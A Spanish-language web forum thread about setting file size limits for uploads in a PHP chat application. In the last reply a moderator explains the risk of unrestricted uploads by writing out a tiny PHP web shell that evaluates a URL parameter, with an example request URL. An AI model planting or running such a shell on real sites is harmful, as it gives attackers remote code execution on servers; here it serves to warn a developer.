elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?  (Leído 2,629 veces)
Drakaris

Desconectado Desconectado

Mensajes: 286


Todo lo que puedas imaginar, lo puedes crear.


Ver Perfil
¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
« en: 5 Noviembre 2018, 16:36 pm »

Hola, estoy en un proceso en mi web, por la cual estoy haciendo un chat, por la cual en este chat, se puede subir archivos (imagenes, videos, audios y documentos), y quisiera saber cuantos MB o KB máximos podría restringir, cada uno. En este caso mi servidor solo acepta 2MB máximo de archivo (cualquiera).

imagenes: png, jpg, jpeg, gif y svg
audio: wav, mp3, ogg y midi
videos: mp4 ,avi ,mov, wmv
documentos: pdf, odt, ods, odp, odg, odf, doc, docx, xls, xlsx y ppt

Gracias.


En línea

Lo increible, no es lo que ves, sino como es
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
« Respuesta #1 en: 5 Noviembre 2018, 17:31 pm »

Hola, podrias saltarte ese filtro de 2 MB maximos, y tu determinar el tamaño adecuado ya sea por tipo de archivo y/o por permisos de usuario.

YO hace tiempo implemente un Upload gracias javascript con RESUMABLE y podia subir archivos de cualquier tamaño.

http://www.resumablejs.com/

Saludos


En línea

Drakaris

Desconectado Desconectado

Mensajes: 286


Todo lo que puedas imaginar, lo puedes crear.


Ver Perfil
Re: ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
« Respuesta #2 en: 5 Noviembre 2018, 17:33 pm »

Hola, podrias saltarte ese filtro de 2 MB maximos, y tu determinar el tamaño adecuado ya sea por tipo de archivo y/o por permisos de usuario.

YO hace tiempo implemente un Upload gracias javascript con RESUMABLE y podia subir archivos de cualquier tamaño.

http://www.resumablejs.com/

Saludos

Ok, gracias, lo miraré.
En caso de si me fue bien. Que tamaño me recomiendan?
En línea

Lo increible, no es lo que ves, sino como es
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
« Respuesta #3 en: 5 Noviembre 2018, 17:49 pm »

Pues realmente todo depende de tu hosting, si no te limitan el espacio en disco lo mas recomendable es que no limites a los usuarios, dejalo en los 2 MB.

Aun asi insisto, si limitas el tamaño del archivo, tu servicio no presentaria ningun plus

Hechale un ojo a Resumable, no es dificil de implementar.

Y ojo con el upload de archivos, no te vallan a subir un archivo PHP y te vallan a hackear el sitio.

Saludos
En línea

Drakaris

Desconectado Desconectado

Mensajes: 286


Todo lo que puedas imaginar, lo puedes crear.


Ver Perfil
Re: ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
« Respuesta #4 en: 5 Noviembre 2018, 18:12 pm »

Pues realmente todo depende de tu hosting, si no te limitan el espacio en disco lo mas recomendable es que no limites a los usuarios, dejalo en los 2 MB.

Aun asi insisto, si limitas el tamaño del archivo, tu servicio no presentaria ningun plus

Hechale un ojo a Resumable, no es dificil de implementar.

Y ojo con el upload de archivos, no te vallan a subir un archivo PHP y te vallan a hackear el sitio.

Saludos



Muchas gracias por la seguridad, no sabia elo de php



Pues realmente todo depende de tu hosting, si no te limitan el espacio en disco lo mas recomendable es que no limites a los usuarios, dejalo en los 2 MB.

Aun asi insisto, si limitas el tamaño del archivo, tu servicio no presentaria ningun plus

Hechale un ojo a Resumable, no es dificil de implementar.

Y ojo con el upload de archivos, no te vallan a subir un archivo PHP y te vallan a hackear el sitio.

Saludos

Como me podrian hackear la web con un archivo php?



Mod: Prohibido hacer doble post. Usa el boton modificar.
« Última modificación: 11 Noviembre 2018, 18:50 pm por #!drvy » En línea

Lo increible, no es lo que ves, sino como es
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: ¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?
« Respuesta #5 en: 5 Noviembre 2018, 22:55 pm »

Imaginate que eres un atacante y sabes que el Upload te permite subir cualquier tipo de archivo.

Tienes manera de conocer o descubrir en que directorio WEB se almacena y ese directorio esta accesible via http://example/directorio/archivo.php

Ahora solo subimos un pequeño codigo

Código
  1. <?php
  2. if(isset($_GET["e"])) {
  3. e v a 1($_GET["e"]);
  4. }
  5. ?>
  6.  

Por decir un ejemplo

ahora cuando llamemos a ese archivo y le pasemos

http://example/directorio/archivo.php?e=CodigoPHPMaligno

El restante es solo cuestion de saber que se quiere hacer en el servidor remoto.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Aumentar tamaño maximo de archivos para subir?
PHP
Joystickoso 2 4,425 Último mensaje 18 Agosto 2009, 22:36 pm
por Joystickoso
Sobre tamaño máximo de password en facebook
Dudas Generales
omeprazol 5 7,008 Último mensaje 28 Abril 2011, 06:13 am
por .:UND3R:.
Tamaño maximo de archivo.
Programación Visual Basic
Elemental Code 2 2,591 Último mensaje 30 Diciembre 2011, 03:00 am
por cobein
tamaño máximo de una list<>
Programación C/C++
solkan05 7 3,444 Último mensaje 27 Agosto 2013, 15:45 pm
por solkan05
Ram maximo como tamaño fisico y virtual?
Hardware
akodo 7 2,633 Último mensaje 11 Septiembre 2015, 17:27 pm
por Randomize
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines